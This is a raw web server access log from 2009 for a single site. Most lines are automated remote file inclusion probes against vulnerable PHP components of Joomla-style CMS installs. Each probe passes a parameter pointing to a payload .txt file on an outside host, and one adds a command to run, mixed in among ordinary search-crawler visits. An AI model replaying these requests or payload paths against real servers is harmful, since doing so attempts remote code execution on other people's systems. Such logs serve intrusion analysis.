222.236.47.23 - - [04/Oct/2009:19:05:33 -0700] "GET /logs///admin/spaw/spaw_control.class.php?spaw_root=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.106.210 - - [04/Oct/2009:19:07:18 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
81.12.13.152 - - [04/Oct/2009:19:07:27 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [04/Oct/2009:19:07:27 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [04/Oct/2009:19:07:27 -0700] "GET /logs/access_090601.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [04/Oct/2009:19:07:31 -0700] "GET /logs/access_090801.log/error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.106.210 - - [04/Oct/2009:19:09:16 -0700] "GET /tmp/?M=D HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:17:14 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:17:21 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:17:21 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.186.64.229 - - [04/Oct/2009:19:17:48 -0700] "GET /logs/access_090801.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.186.64.229 - - [04/Oct/2009:19:17:48 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.186.64.229 - - [04/Oct/2009:19:17:48 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
203.237.203.241 - - [04/Oct/2009:19:22:35 -0700] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://pappermint.casu.net/bbs/bjork/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
203.237.203.241 - - [04/Oct/2009:19:22:35 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://pappermint.casu.net/bbs/bjork/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
203.237.203.241 - - [04/Oct/2009:19:22:36 -0700] "GET /skin/zero_vote/error.php?dir=http://pappermint.casu.net/bbs/bjork/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.231.1.214 - - [04/Oct/2009:19:22:52 -0700] "GET /logs/access_090801.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.231.1.214 - - [04/Oct/2009:19:22:52 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.231.1.214 - - [04/Oct/2009:19:22:52 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.231.1.214 - - [04/Oct/2009:19:23:51 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.231.1.214 - - [04/Oct/2009:19:23:51 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.231.1.214 - - [04/Oct/2009:19:23:51 -0700] "GET /logs/access_090801.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:28:46 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:28:55 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.30.78.215 - - [04/Oct/2009:19:28:55 -0700] "GET /_private/?N=D HTTP/1.0" 200 659 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
77.242.37.212 - - [04/Oct/2009:19:28:58 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.232.11 - - [04/Oct/2009:19:29:36 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
65.55.232.11 - - [04/Oct/2009:19:29:36 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
65.55.232.11 - - [04/Oct/2009:19:29:37 -0700] "GET /?S=A HTTP/1.1" 200 916 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
77.242.37.212 - - [04/Oct/2009:19:32:04 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:32:04 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:32:05 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:32:53 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:32:53 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:33:00 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:36:33 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:36:46 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:36:47 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:38:44 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
193.47.80.37 - - [04/Oct/2009:19:39:13 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.wirama.com"
193.47.80.37 - - [04/Oct/2009:19:39:13 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.wirama.com"
72.9.225.71 - - [04/Oct/2009:19:40:31 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.9.225.71 - - [04/Oct/2009:19:40:31 -0700] "GET /logs/access_090601.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.9.225.71 - - [04/Oct/2009:19:40:36 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.9.225.71 - - [04/Oct/2009:19:40:36 -0700] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:42:46 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:44:56 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:44:56 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:45:02 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
69.20.67.111 - - [04/Oct/2009:19:49:26 -0700] "GET /logs/mygallerybrowser.php?myPath=http://global-independent.net/mp3/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
69.20.67.111 - - [04/Oct/2009:19:49:27 -0700] "GET /mygallerybrowser.php?myPath=http://global-independent.net/mp3/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
69.20.67.111 - - [04/Oct/2009:19:49:27 -0700] "GET /logs/access_090601.log/mygallerybrowser.php?myPath=http://global-independent.net/mp3/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
208.80.193.38 - - [04/Oct/2009:19:49:35 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=jocker; acc=none; (none))" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:50:06 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:50:12 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:50:12 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:50:20 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:50:46 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:51:49 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:51:49 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:19:51:55 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.200.68 - - [04/Oct/2009:19:54:27 -0700] "GET /logs/access_090801.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://garculas.justfree.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.200.68 - - [04/Oct/2009:19:54:27 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://garculas.justfree.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.228.200.68 - - [04/Oct/2009:19:54:27 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://garculas.justfree.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.186.64.229 - - [04/Oct/2009:19:59:32 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.186.64.229 - - [04/Oct/2009:19:59:33 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.186.64.229 - - [04/Oct/2009:19:59:35 -0700] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.186.64.229 - - [04/Oct/2009:19:59:49 -0700] "GET /logs/access_090601.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.169.141.144 - - [04/Oct/2009:20:02:50 -0700] "GET /logs/access_090801.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://hidost.com//images/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.169.141.144 - - [04/Oct/2009:20:02:50 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://hidost.com//images/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.169.141.144 - - [04/Oct/2009:20:02:50 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://hidost.com//images/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.111.213.195 - - [04/Oct/2009:20:02:59 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/2361651_3xu3n/id22.txt??? HTTP/1.1" 200 3137 "-" "libwww-perl/5.79" "wirama.com"
211.111.213.195 - - [04/Oct/2009:20:03:00 -0700] "GET /?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/2361651_3xu3n/id22.txt??? HTTP/1.1" 200 916 "-" "libwww-perl/5.79" "wirama.com"
211.111.213.195 - - [04/Oct/2009:20:10:23 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/2361651_3xu3n/id22.txt??? HTTP/1.1" 200 3137 "-" "libwww-perl/5.79" "wirama.com"
211.111.213.195 - - [04/Oct/2009:20:10:23 -0700] "GET /?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/2361651_3xu3n/id22.txt??? HTTP/1.1" 200 916 "-" "libwww-perl/5.79" "wirama.com"
65.55.207.72 - - [04/Oct/2009:20:15:48 -0700] "GET /_private/form_results.csv HTTP/1.1" 200 0 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
78.172.39.125 - - [04/Oct/2009:20:26:34 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://bluepadma.com/56.txt?cmd=id HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.wirama.com"
203.237.203.241 - - [04/Oct/2009:20:31:02 -0700] "GET /logs/access_090601.log//skin/zero_vote/error.php?dir=http://pappermint.casu.net/bbs/bjork/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.208.60 - - [04/Oct/2009:20:32:29 -0700] "GET /logs/?M=D HTTP/1.1" 200 3137 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.106.112 - - [04/Oct/2009:20:36:45 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.106.112 - - [04/Oct/2009:20:47:47 -0700] "GET /?N=D HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.106.235 - - [04/Oct/2009:20:49:16 -0700] "GET /logs/ HTTP/1.1" 200 3137 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
218.55.227.178 - - [04/Oct/2009:21:03:50 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.55.227.178 - - [04/Oct/2009:21:03:50 -0700] "GET /logs/access_090801.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.55.227.178 - - [04/Oct/2009:21:03:50 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.219.245.149 - - [04/Oct/2009:21:04:24 -0700] "GET /logs/access_090601.log//components/com_simpleboard/image_upload.php?sbp=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.219.245.149 - - [04/Oct/2009:21:04:24 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.219.245.149 - - [04/Oct/2009:21:04:24 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.219.245.149 - - [04/Oct/2009:21:04:28 -0700] "GET /logs/access_090331.log//components/com_simpleboard/image_upload.php?sbp=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:21:05:41 -0700] "GET /logs/access_090801.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:21:05:41 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:21:05:45 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.219.245.149 - - [04/Oct/2009:21:06:36 -0700] "GET /logs/access_090601.log//components/com_simpleboard/image_upload.php?sbp=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.219.245.149 - - [04/Oct/2009:21:06:36 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.219.245.149 - - [04/Oct/2009:21:06:37 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.219.245.149 - - [04/Oct/2009:21:06:41 -0700] "GET /logs/access_090331.log//components/com_simpleboard/image_upload.php?sbp=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
174.34.157.98 - - [04/Oct/2009:21:06:58 -0700] "GET /logs/access_090501.log HTTP/1.1" 206 3145728 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt\\)" "www.wirama.com"
174.34.157.98 - - [04/Oct/2009:21:06:59 -0700] "GET /logs/access_090501.log HTTP/1.1" 206 1048576 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.wirama.com"
218.55.227.178 - - [04/Oct/2009:21:07:39 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.55.227.178 - - [04/Oct/2009:21:07:39 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.55.227.178 - - [04/Oct/2009:21:07:39 -0700] "GET /logs/access_090801.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.207.52 - - [04/Oct/2009:21:11:55 -0700] "GET / HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
77.242.37.212 - - [04/Oct/2009:21:12:21 -0700] "GET /logs/access_090801.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:21:12:27 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [04/Oct/2009:21:12:27 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejuangel.net/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.230.156 - - [04/Oct/2009:21:16:42 -0700] "GET /logs/access_090330.log HTTP/1.1" 200 0 "-" "Mozilla/4.0" "wirama.com"
94.23.63.201 - - [04/Oct/2009:21:24:37 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.establish.ba/root/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
94.23.63.201 - - [04/Oct/2009:21:24:37 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.establish.ba/root/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
94.23.63.201 - - [04/Oct/2009:21:24:37 -0700] "GET /logs/access_090601.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.establish.ba/root/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
94.23.63.201 - - [04/Oct/2009:21:24:44 -0700] "GET /logs/access_090401.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.establish.ba/root/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
94.23.63.201 - - [04/Oct/2009:21:24:59 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.establish.ba/root/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
94.23.63.201 - - [04/Oct/2009:21:24:59 -0700] "GET /logs/access_090601.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.establish.ba/root/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
94.23.63.201 - - [04/Oct/2009:21:24:59 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.establish.ba/root/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
94.23.63.201 - - [04/Oct/2009:21:24:59 -0700] "GET /logs/access_090401.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.establish.ba/root/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.234.19.49 - - [04/Oct/2009:21:45:04 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.234.19.49 - - [04/Oct/2009:21:45:04 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/9/19/2579345/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.234.19.49 - - [04/Oct/2009:21:45:04 -0700] "GET /logs/access_090801.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/9/19/2579345/1.txt? H